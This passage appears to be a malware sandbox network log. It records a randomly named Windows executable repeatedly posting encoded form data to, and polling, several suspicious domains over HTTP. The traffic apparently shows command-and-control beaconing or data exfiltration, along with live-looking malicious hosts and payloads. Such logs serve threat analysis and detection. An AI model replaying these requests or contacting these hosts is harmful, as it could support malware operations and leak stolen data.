                                                                                                                    Content-Length: 634
                                                                                                                    Connection: close
                                                                                                                    Server: Apache
                                                                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Ошибка 404. Файл не найден</title></head><body><noscript><h1>Ошибка 404. Файл не найден</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    4 | 192.168.2.5 | 49716 | 195.161.68.8 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:22.559343100 CEST | 478 | OUT | GET /czka/?FbuX5DnP=ec+/5ooiqEi687og6mxZgK97hGtyT8hL+UNAVpoR3RpVRqn8W9A98dmq3fmGshL635UHDIR5u/r4iIgXkla3rsnbIqFgNahEcjh4DtJ4lSLz0jzSBM29wabUMiG34aKFBg==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.drivedoge.website
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:57:23.296463013 CEST | 778 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:23 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 634
                                                                                                                    Connection: close
                                                                                                                    Server: Apache
                                                                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Ошибка 404. Файл не найден</title></head><body><noscript><h1>Ошибка 404. Файл не найден</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    5 | 192.168.2.5 | 49717 | 18.141.10.107 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:28.708139896 CEST | 734 | OUT | POST /exug/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.fieldelse.net
                                                                                                                    Origin: http://www.fieldelse.net
                                                                                                                    Referer: http://www.fieldelse.net/exug/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=eWBslyXPujYybnsaUrhGIpWoomq0AVltRWWp/GGx5KlCXKmRMP4Zc1lUJGEUBMMMSDdKrSdQcn6oE05YCelhGTAv6QbVAKKyy0VXlKiIZbHwF6mVoYmxkAH4nAyYI0PKU2L3TDciMkYgewsRRLihKcfgyGXf/3jjUc8HYrLYlqErrGngASrykPhx4CqLwDPelGFgfC0=
                                                                                                                    Sep 30, 2024 19:57:30.045977116 CEST | 718 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=6997142d45c01b68715ce26cf4a575ca|8.46.123.33|1727719049|1727719049|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 140


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    6 | 192.168.2.5 | 49718 | 18.141.10.107 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:31.517009020 CEST | 754 | OUT | POST /exug/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.fieldelse.net
                                                                                                                    Origin: http://www.fieldelse.net
                                                                                                                    Referer: http://www.fieldelse.net/exug/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:57:32.812064886 CEST | 718 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=4b9f79239fdac8cebb79be9ac7a7f2a9|8.46.123.33|1727719052|1727719052|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 140


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    7 | 192.168.2.5 | 49719 | 18.141.10.107 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:34.158343077 CEST | 1771 | OUT | POST /exug/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.fieldelse.net
                                                                                                                    Origin: http://www.fieldelse.net
                                                                                                                    Referer: http://www.fieldelse.net/exug/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    8 | 192.168.2.5 | 49720 | 18.141.10.107 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:36.699052095 CEST | 474 | OUT | GET /exug/?2Zv0=qtmpl4wh&FbuX5DnP=TUpMmFq2kwIXLFstS9tSAK6sg3+MTXwTelyO0iz++Kl2PamQN8cgWwJpHGB2BYM6TBg0ujJhQFrOEWIIA95gJhU2w3nrLf6Fr1xVloq0NNPRZ4qmm6KGpgvxijzqAjWBDA== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.fieldelse.net
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:57:38.032759905 CEST | 668 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=6ee77880b46944532b7aeb2ef77cb048|8.46.123.33|1727719057|1727719057|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    9 | 192.168.2.5 | 49721 | 197.189.237.186 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:43.462918043 CEST | 749 | OUT | POST /iv79/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.patioprojex.africa
                                                                                                                    Origin: http://www.patioprojex.africa
                                                                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    10 | 192.168.2.5 | 49722 | 197.189.237.186 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:46.000499964 CEST | 769 | OUT | POST /iv79/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.patioprojex.africa
                                                                                                                    Origin: http://www.patioprojex.africa
                                                                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    11 | 192.168.2.5 | 49723 | 197.189.237.186 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:48.548779964 CEST | 1786 | OUT | POST /iv79/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.patioprojex.africa
                                                                                                                    Origin: http://www.patioprojex.africa
                                                                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    12 | 192.168.2.5 | 49724 | 197.189.237.186 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:51.090662956 CEST | 479 | OUT | GET /iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.patioprojex.africa
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:57:52.647377968 CEST | 509 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:51 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Powered-By: PHP/8.2.23
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://patioprojex.africa/iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&2Zv0=qtmpl4wh
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    13 | 192.168.2.5 | 49725 | 203.175.9.128 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:59.769814968 CEST | 734 | OUT | POST /7u36/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.animekuid.xyz
                                                                                                                    Origin: http://www.animekuid.xyz
                                                                                                                    Referer: http://www.animekuid.xyz/7u36/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:01.228718996 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:00 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://animekuid.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: br
                                                                                                                    Content-Length: 9101
                                                                                                                    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49726 | 203.175.9.128 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:58:02.317236900 CEST | 754 | OUT | POST /7u36/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.animekuid.xyz
                                                                                                                    Origin: http://www.animekuid.xyz
                                                                                                                    Referer: http://www.animekuid.xyz/7u36/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49727 | 203.175.9.128 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:58:04.862169981 CEST | 1771 | OUT | POST /7u36/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.animekuid.xyz
                                                                                                                    Origin: http://www.animekuid.xyz
                                                                                                                    Referer: http://www.animekuid.xyz/7u36/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Sep 30, 2024 19:58:06.299690008 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:05 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://animekuid.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: br
                                                                                                                    Content-Length: 9101
                                                                                                                    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49728 | 203.175.9.128 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:58:07.408763885 CEST | 474 | OUT | GET /7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZmBZ7MUA7JRhWgDz1/ahDOpP8lgsu8VajAwDFVi2x2f3RqmShFRGyru4wY6+58zPRZ+PwrE6jG4RlKX4A== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.animekuid.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Sep 30, 2024 19:58:08.829647064 CEST | 536 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:08 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Location: http://animekuid.xyz/7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZmBZ7MUA7JRhWgDz1/ahDOpP8lgsu8VajAwDFVi2x2f3RqmShFRGyru4wY6+58zPRZ+PwrE6jG4RlKX4A==
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
Sep 30, 2024 19:58:08.839890003 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49729 | 162.0.238.246 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:58:14.022892952 CEST | 725 | OUT | POST /dbbh/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.huyven.xyz
                                                                                                                    Origin: http://www.huyven.xyz
                                                                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:14.598086119 CEST  595                IN         HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:14 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 389
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    18          192.168.2.5  49730        162.0.238.246   80                4508  C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp                             Bytes transferred  Direction  Data
                                                                                                                    Sep 30, 2024 19:58:16.562277079 CEST  745                OUT        POST /dbbh/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.huyven.xyz
                                                                                                                    Origin: http://www.huyven.xyz
                                                                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=oYOmP/NSGiFpLhG3hCDOYA/EEUbbE6shYbrsmuWgrrFICJFg6AU9EzTPmhwJP0eSa3wQn33FV8lG8mULgtp1LJ42Z/mWUCfkI+mK8JswIsC4JaMzFC/wLQ751vDV728mRlgLasxH5qjRi73m4NrvKDQ8bkW8sWcD5rrCnUlxoXqzNSItXusf/P++in4WZHHZZvEKRSopJWnJ/cSklDKo+onzbOEm
                                                                                                                    Sep 30, 2024 19:58:17.150734901 CEST  595                IN         HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:17 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 389
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    19          192.168.2.5  49731        162.0.238.246   80                4508  C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp                             Bytes transferred  Direction  Data
                                                                                                                    Sep 30, 2024 19:58:19.117880106 CEST  1762               OUT        POST /dbbh/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.huyven.xyz
                                                                                                                    Origin: http://www.huyven.xyz
                                                                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:19.706927061 CEST  595                IN         HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:19 GMT
                                                                                                                    Server: Apache
